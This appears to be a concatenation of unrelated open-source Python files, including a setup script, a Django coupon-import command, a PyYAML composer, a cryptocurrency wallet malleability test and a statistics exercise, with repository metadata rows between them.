sqlite_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'db.sqlite')
app.config['SQLALCHEMY_BINDS'] = {
'wallet': 'sqlite:///' + sqlite_path
}
app.config['SQLALCHEMY_ECHO'] = False
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
db = SQLAlchemy(app)
class CustomJSONEncoder(JSONEncoder):
def default(self, obj):
try:
if isinstance(obj, date):
return JSONEncoder.default(
self,
datetime(obj.year, obj.month, obj.day))
iterable = iter(obj)
except TypeError:
pass
else:
return list(iterable)
return JSONEncoder.default(self, obj)
app.json_encoder = CustomJSONEncoder
| mit | 2,123,392,683,379,252,500 | 28.513514 | 94 | 0.624542 | false |
sambarluc/xmitgcm | setup.py | 1 | 1468 | #!/usr/bin/env python
import os
import re
import sys
import warnings
from setuptools import setup, find_packages
VERSION = '0.2.1'
DISTNAME = 'xmitgcm'
LICENSE = 'Apache'
AUTHOR = 'Ryan Abernathey'
AUTHOR_EMAIL = '[email protected]'
URL = 'https://github.com/xgcm/xmitgcm'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Scientific/Engineering',
]
INSTALL_REQUIRES = ['xarray >= 0.8.2', 'dask >= 0.12']
SETUP_REQUIRES = ['pytest-runner']
TESTS_REQUIRE = ['pytest >= 2.8', 'coverage']
DESCRIPTION = "Read MITgcm mds binary files into xarray"
def readme():
with open('README.rst') as f:
return f.read()
setup(name=DISTNAME,
version=VERSION,
license=LICENSE,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
classifiers=CLASSIFIERS,
description=DESCRIPTION,
long_description=readme(),
install_requires=INSTALL_REQUIRES,
setup_requires=SETUP_REQUIRES,
tests_require=TESTS_REQUIRE,
url=URL,
packages=find_packages())
| mit | 8,516,770,780,736,620,000 | 27.784314 | 57 | 0.658719 | false |
Necrote/PsyHeal | src/modules/Constants.py | 1 | 1897 | Openness = ['Adventurousness','Artistic interests','Emotionality','Imagination','Intellect','Authority-challenging']
Conscientiousness = ['Achievement striving','Cautiousness','Dutifulness','Orderliness','Self-discipline','Self-efficacy']
Extraversion = ['Activity level','Assertiveness','Cheerfulness','Excitement-seeking','Outgoing','Gregariousness']
Agreeableness = ['Altruism','Cooperation','Modesty','Uncompromising','Sympathy','Trust']
EmotionalRange = ['Fiery','Prone to worry','Melancholy','Immoderation','Self-consciousness','Susceptible to stress']
OpAttri = Openness#[ Openness[0] , Openness[2] , Openness[3]]
ConAttri = Conscientiousness#[ Conscientiousness[0] , Conscientiousness[1] , Conscientiousness[2]]
ExtraAttri = Extraversion#[ Extraversion[0] , Extraversion[1] , Extraversion[2]]
AgreeAttri = Agreeableness#[ Agreeableness[1] , Agreeableness[2] , Agreeableness[4]]
EmoAttri = EmotionalRange#[ EmotionalRange[2] , EmotionalRange[4] , EmotionalRange[5]]
personality_traits = ["Openness","Conscientiousness","Extraversion","Agreeableness","Emotional range"]
combinedTraits = [OpAttri,ConAttri,ExtraAttri,AgreeAttri,EmoAttri]
recordLimit = 10
CriticalCount = 3
SelectedAttributes = ['Cautiousness','Melancholy','Self-consciousness','Susceptible to stress','Prone to worry','Authority-challenging','Immoderation','Sympathy','Trust','Cheerfulness']
Constraints = {
'Authority-challenging' : [92.00,100.00],
'Cautiousness' : [93.00,99.00],
'Sympathy' : [0.00,0.15],
'Trust' : [0.00,0.15],
'Prone to worry' : [85.00,100.00],
'Melancholy' : [88.00,100.00],
'Immoderation' : [80.00,100.00],
'Self-consciousness' : [75.00,100.00],
'Susceptible to stress' : [80.00,100.00],
'Cheerfulness' : [0.00,20.00]
} | mit | -899,639,483,063,021,600 | 54.823529 | 185 | 0.672114 | false |
EuroPython/epcon | p3/management/commands/create_bulk_coupons.py | 1 | 2939 |
""" Create a batch of single use discount coupons from a CSV file.
Parameters: <conference> <csv-file>
Creates coupons based on the CSV file contents:
code - coupon code
max_usage - max. number of uses
items_per_usage - max number of items per use
value - value of the coupon in percent
description - description
fares - comma separated list of included fares
Use --dry-run to test drive the script.
"""
import sys
import csv
from django.core.management.base import BaseCommand, CommandError
from django.db import transaction
from conference import models as cmodels
from assopy.models import Coupon
###
class Command(BaseCommand):
args = '<conference> <count>'
# Dry run ?
dry_run = False
def add_arguments(self, parser):
# Positional arguments
parser.add_argument('conference')
parser.add_argument('csv')
# Named (optional) arguments
parser.add_argument('--dry-run',
action='store_true',
dest='dry_run',
default=False,
help='Do everything except create the coupons')
@transaction.atomic
def handle(self, *args, **options):
conference = cmodels.Conference.objects.get(code=options['conference'])
self.dry_run = options.get('dry_run', False)
csv_filename = options['csv']
# Get set of existing coupon codes
all_codes = set(c['code'] for c in Coupon.objects\
.filter(conference=conference.code)\
.values('code'))
# Valid fares (conference fares only)
all_fares = cmodels.Fare.objects\
.filter(conference=conference.code)
# Create coupons
if csv_filename == 'stdin':
csv_file = sys.stdin
else:
csv_file = open(csv_filename)
with csv_file:
reader = csv.DictReader(csv_file)
for row in reader:
code = row['code'].strip()
if not code:
# Skip lines without code
continue
if code in all_codes:
# Skip coupons which already exist
print ('Coupon %r already exists - skipping' % code)
continue
c = Coupon(conference=conference)
c.code = code
c.max_usage = int(row.get('max_usage', 1))
c.items_per_usage = int(row.get('items_per_usage', 1))
c.value = row['value']
c.description = row.get('description', '')
if not self.dry_run:
c.save()
c.fares = all_fares.filter(
code__in = [x.strip()
for x in row['fares'].split(',')])
print ('Coupond %r created' % c.code)
| bsd-2-clause | 2,320,317,015,816,716,000 | 30.945652 | 79 | 0.539639 | false |
mxOBS/deb-pkg_trusty_chromium-browser | third_party/chromite/lib/paygen/fixup_path.py | 1 | 1342 | # Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper for other scripts that need a PYTHONPATH entry for crostools.
Generally used by import statements of the form:
from chromite.lib.paygen import foo
from crostools.scripts import foo
"""
# pylint: disable=bad-continuation
from __future__ import print_function
import os.path
import sys
# Find the correct root path to insert into sys.path for importing
# modules in this source.
CROSTOOLS_ROOT = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..'))
CROSTOOLS_PATH_ROOT = os.path.dirname(CROSTOOLS_ROOT)
CROS_SRC_PLATFORM_PATH = os.path.join(CROSTOOLS_PATH_ROOT, 'src', 'platform')
CROS_AUTOTEST_PATH = os.path.join(CROSTOOLS_PATH_ROOT, 'src', 'third_party',
'autotest', 'files')
def _SysPathPrepend(dir_name):
"""Prepend a directory to Python's import path."""
if os.path.isdir(dir_name) and dir_name not in sys.path:
sys.path.insert(0, dir_name)
def FixupPath():
_SysPathPrepend(CROS_AUTOTEST_PATH)
_SysPathPrepend(CROS_SRC_PLATFORM_PATH)
_SysPathPrepend(CROSTOOLS_PATH_ROOT)
# TODO(dgarrett): Remove this call after all importers do it locally.
FixupPath()
| bsd-3-clause | 203,790,605,844,258,900 | 28.173913 | 77 | 0.717586 | false |
levilucio/SyVOLT | GM2AUTOSAR_MM/Properties/from_eclipse/HP1_ConnectedLHS.py | 1 | 19004 | from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HP1_ConnectedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HP1_ConnectedLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HP1_ConnectedLHS, self).__init__(name='HP1_ConnectedLHS', num_nodes=0, edges=[])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'P1')
# Set the node attributes
# match class PhysicalNode() node
self.add_node()
self.vs[0]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["MT_label__"] = """1"""
self.vs[0]["MT_dirty__"] = False
self.vs[0]["mm__"] = """MT_pre__PhysicalNode"""
self.vs[0]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Partition() node
self.add_node()
self.vs[1]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_label__"] = """2"""
self.vs[1]["MT_dirty__"] = False
self.vs[1]["mm__"] = """MT_pre__Partition"""
self.vs[1]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Module() node
self.add_node()
self.vs[2]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_label__"] = """3"""
self.vs[2]["MT_dirty__"] = False
self.vs[2]["mm__"] = """MT_pre__Module"""
self.vs[2]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Scheduler() node
self.add_node()
self.vs[3]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_label__"] = """4"""
self.vs[3]["MT_dirty__"] = False
self.vs[3]["mm__"] = """MT_pre__Scheduler"""
self.vs[3]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Service() node
self.add_node()
self.vs[4]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[4]["MT_label__"] = """5"""
self.vs[4]["MT_dirty__"] = False
self.vs[4]["mm__"] = """MT_pre__Service"""
self.vs[4]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# Nodes that represent the edges of the property.
# match association PhysicalNode--partition-->Partition node
self.add_node()
self.vs[5]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "partition"
"""
self.vs[5]["MT_label__"] = """6"""
self.vs[5]["MT_subtypes__"] = []
self.vs[5]["MT_dirty__"] = False
self.vs[5]["mm__"] = """MT_pre__directLink_S"""
self.vs[5]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc5')
# match association Partition--module-->Module node
self.add_node()
self.vs[6]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "module"
"""
self.vs[6]["MT_label__"] = """7"""
self.vs[6]["MT_subtypes__"] = []
self.vs[6]["MT_dirty__"] = False
self.vs[6]["mm__"] = """MT_pre__directLink_S"""
self.vs[6]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc6')
# match association Module--scheduler-->Scheduler node
self.add_node()
self.vs[7]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "scheduler"
"""
self.vs[7]["MT_label__"] = """8"""
self.vs[7]["MT_subtypes__"] = []
self.vs[7]["MT_dirty__"] = False
self.vs[7]["mm__"] = """MT_pre__directLink_S"""
self.vs[7]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc7')
# match association Scheduler--provided-->Service node
self.add_node()
self.vs[8]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "provided"
"""
self.vs[8]["MT_label__"] = """9"""
self.vs[8]["MT_subtypes__"] = []
self.vs[8]["MT_dirty__"] = False
self.vs[8]["mm__"] = """MT_pre__directLink_S"""
self.vs[8]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc8')
# Add the edges
self.add_edges([
(0,5), # match_class PhysicalNode() -> association partition
(5,1), # association partition -> match_class Partition()
(1,6), # match_class Partition() -> association module
(6,2), # association module -> match_class Module()
(2,7), # match_class Module() -> association scheduler
(7,3), # association scheduler -> match_class Scheduler()
(3,8), # match_class Scheduler() -> association provided
(8,4) # association provided -> match_class Service()
])
# Add the attribute equations
self["equations"] = []
def eval_attr11(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr12(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr13(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr14(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr15(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr16(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "partition"
def eval_attr17(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "module"
def eval_attr18(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "scheduler"
def eval_attr19(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "provided"
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| mit | 5,550,988,573,478,345,000 | 51.788889 | 125 | 0.470375 | false |
navcoindev/navcoin-core | qa/rpc-tests/txn_clone.py | 1 | 7549 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test proper accounting with an equivalent malleability clone
#
from test_framework.test_framework import NavCoinTestFramework
from test_framework.util import *
class TxnMallTest(NavCoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 4
self.setup_clean_chain = False
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
return super(TxnMallTest, self).setup_network(True)
def run_test(self):
# All nodes should start with 1,250 NAV:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
self.nodes[0].settxfee(.001)
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# Send tx1, and another transaction tx2 that won't be cloned
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Construct a clone of tx1, to be malleated
rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
clone_locktime = rawtx1["locktime"]
clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs, clone_locktime)
# createrawtransaction randomizes the order of its outputs, so swap them if necessary.
# output 0 is at version+#inputs+input+sigstub+sequence+#outputs
# 40 NAV serialized is 00286bee00000000
pos0 = 2*(4+1+36+1+4+1)
hex40 = "00286bee00000000"
output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
output0 = clone_raw[pos0 : pos0 + output_len]
output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
# Use a different signature hash type to sign. This creates an equivalent but malleated clone.
# Don't send the clone anywhere yet
tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
assert_equal(tx1_clone["complete"], True)
# Have node0 mine a block, if requested:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50NAV for another
# matured block, minus tx1 and tx2 amounts, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Send clone and its parent to miner
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
self.nodes[2].sendrawtransaction(tx2["hex"])
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx1_clone = self.nodes[0].gettransaction(txid1_clone)
tx2 = self.nodes[0].gettransaction(txid2)
# Verify expected confirmations
assert_equal(tx1["confirmations"], -2)
assert_equal(tx1_clone["confirmations"], 2)
assert_equal(tx2["confirmations"], 1)
# Check node0's total balance; should be same as before the clone, + 100 NAV for 2 matured,
# less possible orphaned matured subsidy
expected += 100
if (self.options.mine_block):
expected -= 50
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*", 0), expected)
# Check node0's individual account balances.
# "foo" should have been debited by the equivalent clone of tx1
assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
# "bar" should have been debited by (possibly unconfirmed) tx2
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
# "" should have starting balance, less funding txes, plus subsidies
assert_equal(self.nodes[0].getbalance("", 0), starting_balance
- 1219
+ fund_foo_tx["fee"]
- 29
+ fund_bar_tx["fee"]
+ 100)
# Node1's "from0" account balance
assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
if __name__ == '__main__':
TxnMallTest().main()
| mit | -8,845,441,044,191,796,000 | 46.477987 | 111 | 0.592794 | false |
croxis/SpaceDrive | spacedrive/renderpipeline/rplibs/yaml/yaml_py3/composer.py | 1 | 5020 |
__all__ = ['Composer', 'ComposerError']
from .error import MarkedYAMLError
from .events import *
from .nodes import *
class ComposerError(MarkedYAMLError):
pass
class Composer:
def __init__(self):
self.anchors = {}
def check_node(self):
# Drop the STREAM-START event.
if self.check_event(StreamStartEvent):
self.get_event()
# If there are more documents available?
return not self.check_event(StreamEndEvent)
def get_node(self):
# Get the root node of the next document.
if not self.check_event(StreamEndEvent):
return self.compose_document()
def get_single_node(self):
# Drop the STREAM-START event.
self.get_event()
# Compose a document if the stream is not empty.
document = None
if not self.check_event(StreamEndEvent):
document = self.compose_document()
# Ensure that the stream contains no more documents.
if not self.check_event(StreamEndEvent):
event = self.get_event()
raise ComposerError("expected a single document in the stream",
document.start_mark, "but found another document",
event.start_mark)
# Drop the STREAM-END event.
self.get_event()
return document
def compose_document(self):
# Drop the DOCUMENT-START event.
self.get_event()
# Compose the root node.
node = self.compose_node(None, None)
# Drop the DOCUMENT-END event.
self.get_event()
self.anchors = {}
return node
def compose_node(self, parent, index):
if self.check_event(AliasEvent):
event = self.get_event()
anchor = event.anchor
if anchor not in self.anchors:
raise ComposerError(None, None, "found undefined alias %r"
% anchor, event.start_mark)
return self.anchors[anchor]
event = self.peek_event()
anchor = event.anchor
if anchor is not None:
if anchor in self.anchors:
raise ComposerError("found duplicate anchor %r; first occurence"
% anchor, self.anchors[anchor].start_mark,
"second occurence", event.start_mark)
self.descend_resolver(parent, index)
if self.check_event(ScalarEvent):
node = self.compose_scalar_node(anchor)
elif self.check_event(SequenceStartEvent):
node = self.compose_sequence_node(anchor)
elif self.check_event(MappingStartEvent):
node = self.compose_mapping_node(anchor)
self.ascend_resolver()
return node
def compose_scalar_node(self, anchor):
event = self.get_event()
tag = event.tag
if tag is None or tag == '!':
tag = self.resolve(ScalarNode, event.value, event.implicit)
node = ScalarNode(tag, event.value,
event.start_mark, event.end_mark, style=event.style)
if anchor is not None:
self.anchors[anchor] = node
return node
def compose_sequence_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == '!':
tag = self.resolve(SequenceNode, None, start_event.implicit)
node = SequenceNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
index = 0
while not self.check_event(SequenceEndEvent):
node.value.append(self.compose_node(node, index))
index += 1
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
def compose_mapping_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == '!':
tag = self.resolve(MappingNode, None, start_event.implicit)
node = MappingNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
while not self.check_event(MappingEndEvent):
#key_event = self.peek_event()
item_key = self.compose_node(node, None)
#if item_key in node.value:
# raise ComposerError("while composing a mapping", start_event.start_mark,
# "found duplicate key", key_event.start_mark)
item_value = self.compose_node(node, item_key)
#node.value[item_key] = item_value
node.value.append((item_key, item_value))
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
| mit | 6,579,740,711,259,711,000 | 34.115108 | 89 | 0.564343 | false |
acimmarusti/isl_exercises | chap4/chap4ex13.py | 1 | 5743 | from __future__ import print_function, division
import matplotlib.pyplot as plt
import numpy as np
import scipy
import pandas as pd
import seaborn as sns
from sklearn.datasets import load_boston
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis
from sklearn.metrics import confusion_matrix, accuracy_score, precision_score, recall_score
from pandas.tools.plotting import scatter_matrix
import statsmodels.formula.api as smf
import statsmodels.api as sm
#Load boston dataset from sklearn#
boston = load_boston()
#Columns#
#print(boston['feature_names'])
#Descriptio#
#print(boston['DESCR'])
rawdata = pd.DataFrame(boston.data, columns=boston.feature_names)
rawdata['MEDV'] = boston.target
#Convert to NaN#
data = rawdata.replace(to_replace='None', value=np.nan).copy()
#Create the binary variable CRIM01#
data['CRIM01'] = np.where(data['CRIM'] > data['CRIM'].median(), 1, 0)
#Columns#
numcols = list(data.columns)
numcols.remove('CRIM')
#Predictor without target columns#
xcols = list(numcols)
xcols.remove('CRIM01')
#Summary (mean, stdev, range, etc)#
print('\nFull data summary')
print(data.describe())
#Correlations#
print('\nData correlations')
dcorrs = data.corr()
print(dcorrs)
#Pair plot matrix#
#sns.set()
#sns.pairplot(data[numcols], hue='CRIM01')
print('\n\n### LOGISTIC REGRESSION###')
## Logistic regression with statsmodels ##
plr_form = 'CRIM01~' + '+'.join(xcols)
prelogreg = smf.glm(formula=plr_form, data=data, family=sm.families.Binomial()).fit()
#Remove predictors with high P-values from LogReg#
logit_pvals = prelogreg.pvalues
pred_keep = list(logit_pvals[logit_pvals < 0.05].index)
pred_keep.remove('Intercept')
print('\nAfter first LogReg iteration, keeping only: ', pred_keep)
# New LogReg with only low p-value predictors#
lr_form = 'CRIM01~' + '+'.join(pred_keep)
logreg = smf.glm(formula=lr_form, data=data, family=sm.families.Binomial()).fit()
print('\nLogistic regression fit summary')
print(logreg.summary())
#Splitting the data for train/test#
X_data = data[pred_keep]
Y_data = data['CRIM01']
X_train, X_test, Y_train, Y_test = train_test_split(X_data, Y_data, test_size=0.5, random_state=42, stratify=Y_data)
# Initiate logistic regression object
logit_clf = LogisticRegression()
# Fit model. Let X_train = matrix of predictors, Y_train = matrix of variables.
resLogit_clf = logit_clf.fit(X_train, Y_train)
#Predicted values for training set
Y_pred_logit = resLogit_clf.predict(X_test)
#Confusion matrix#
print("\nConfusion matrix logit:")
print(confusion_matrix(Y_test, Y_pred_logit))
#Accuracy, precision and recall#
